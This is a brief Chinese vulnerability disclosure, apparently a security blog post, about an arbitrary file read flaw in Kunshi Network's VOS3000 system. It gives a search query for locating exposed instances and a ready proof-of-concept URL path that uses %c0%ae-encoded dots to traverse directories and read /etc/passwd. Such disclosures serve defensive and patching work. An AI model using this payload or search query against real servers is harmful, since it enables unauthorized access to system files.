昆石网络 VOS3000虚拟运营支撑系统任意文件读取漏洞

漏洞描述

昆石网络 VOS3000虚拟运营支撑系统 通过 %c0%ae%c0%ae 等字符绕过检测,可导致任意文件读取漏洞。

漏洞影响

昆石网络 VOS3000虚拟运营支撑系统

网络测绘

app=”VOS-VOS3000″

漏洞复现

登录页面

20240410101511654-png

验证POC

/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd

20240410101730916-png (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容